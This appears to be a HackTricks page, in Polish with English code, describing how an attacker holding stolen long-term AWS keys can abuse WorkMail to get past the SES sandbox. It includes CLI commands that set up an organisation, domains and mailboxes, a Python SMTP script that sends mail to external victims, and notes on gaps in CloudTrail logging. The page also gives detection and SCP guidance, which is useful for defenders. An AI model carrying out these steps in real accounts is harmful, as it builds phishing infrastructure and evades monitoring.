AWS - WorkMail Post Exploitation

Tip

Ucz się & ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się & ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ucz się & ćwicz Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Wspieraj HackTricks

Sprawdź subscription plans!

Dołącz do 💬 Discord group lub telegram group lub śledź nas na Twitterze 🐦 @hacktricks_live.

Podziel się hacking tricks, zgłaszając PRy do HackTricks i HackTricks Cloud github repos.

Nadużywanie WorkMail do obejścia sandboxu SES

Nawet jeśli SES utknął w sandboxie (tylko zweryfikowani odbiorcy, ~200 msgs/24h, 1 msg/s), WorkMail nie ma odpowiedniego ograniczenia. Atakujący dysponujący long-term keys może uruchomić jednorazową infrastrukturę mailową i zacząć wysyłać natychmiast:

Create a WorkMail org (region-scoped)

aws workmail create-organization --region us-east-1 --alias temp-mail --directory-id <dir-id-if-reusing>

Verify attacker-controlled domains (WorkMail invokes SES APIs as workmail.amazonaws.com):

aws ses verify-domain-identity --domain attacker-domain.com
aws ses verify-domain-dkim --domain attacker-domain.com

Provision mailbox users and register them:

aws workmail create-user --organization-id <org-id> --name marketing --display-name "Marketing"
aws workmail register-to-work-mail --organization-id <org-id> --entity-id <user-id> --email marketing@attacker-domain.com

Uwagi:

Domyślny recipient cap dokumentowany przez AWS: 100,000 external recipients/day per org (sumarycznie dla użytkowników).
Aktywność weryfikacji domen będzie widoczna w CloudTrail pod SES, ale z invokedBy: workmail.<region>.amazonaws.com, więc zdarzenia weryfikacji SES mogą pochodzić z konfiguracji WorkMail, a nie z kampanii SES.
Użytkownicy skrzynek WorkMail stają się application-layer persistence niezależnie od IAM users.

Ścieżki wysyłki i luki w telemetrii

Web client (WorkMail UI)

Wysyłki pojawiają się jako zdarzenia ses:SendRawEmail w CloudTrail.
userIdentity.type = AWSService, invokedBy/sourceIPAddress/userAgent = workmail.<region>.amazonaws.com, więc prawdziwy IP klienta jest ukryty.
requestParameters nadal zawierają leak nadawcy (source, fromArn, sourceArn, configuration set) umożliwiający skorelowanie z nowo zweryfikowanymi domenami/skrzynkami.

SMTP (najbardziej dyskretny)

Endpoint: smtp.mail.<region>.awsapps.com:465 (SMTP over SSL) z hasłem skrzynki.
No CloudTrail data events są generowane dla dostarczania SMTP, nawet gdy SES data events są włączone.
Ideal detection points to org/domain/user provisioning oraz SES identity ARNs referenced in subsequent web-sent SendRawEmail events.

Przykład wysyłki SMTP przez WorkMail

```python import smtplib from email.message import EmailMessage

SMTP_SERVER = “smtp.mail.us-east-1.awsapps.com” SMTP_PORT = 465 EMAIL_ADDRESS = “marketing@attacker-domain.com” EMAIL_PASSWORD = “SuperSecretPassword!”

target = “victim@example.com” # can be unverified/external msg = EmailMessage() msg[“Subject”] = “WorkMail SMTP” msg[“From”] = EMAIL_ADDRESS msg[“To”] = target msg.set_content(“Delivered via WorkMail SMTP”)

with smtplib.SMTP_SSL(SMTP_SERVER, SMTP_PORT) as smtp: smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD) smtp.send_message(msg)

</details>

## Uwagi dotyczące wykrywania

- Jeśli WorkMail nie jest potrzebny, zablokuj go za pomocą **SCPs** (`workmail:*` deny) na poziomie organizacji.
- Włącz alerty przy provisioningu: `workmail:CreateOrganization`, `workmail:CreateUser`, `workmail:RegisterToWorkMail`, oraz weryfikacjach SES z `invokedBy=workmail.amazonaws.com` (`ses:VerifyDomainIdentity`, `ses:VerifyDomainDkim`).
- Monitoruj anomalne zdarzenia **`ses:SendRawEmail`**, w których identity ARNs odnoszą się do nowych domen, a source IP/UA odpowiada `workmail.<region>.amazonaws.com`.

## References

- [Threat Actors Using AWS WorkMail in Phishing Campaigns](https://www.rapid7.com/blog/post/dr-threat-actors-aws-workmail-phishing-campaigns)
- [AWS WorkMail limits](https://docs.aws.amazon.com/workmail/latest/adminguide/limits.html)

> [!TIP]
> Ucz się & ćwicz AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Ucz się & ćwicz GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Ucz się & ćwicz Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Wspieraj HackTricks</summary>
>
> - Sprawdź [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Dołącz do** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) lub [**telegram group**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Podziel się hacking tricks, zgłaszając PRy do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>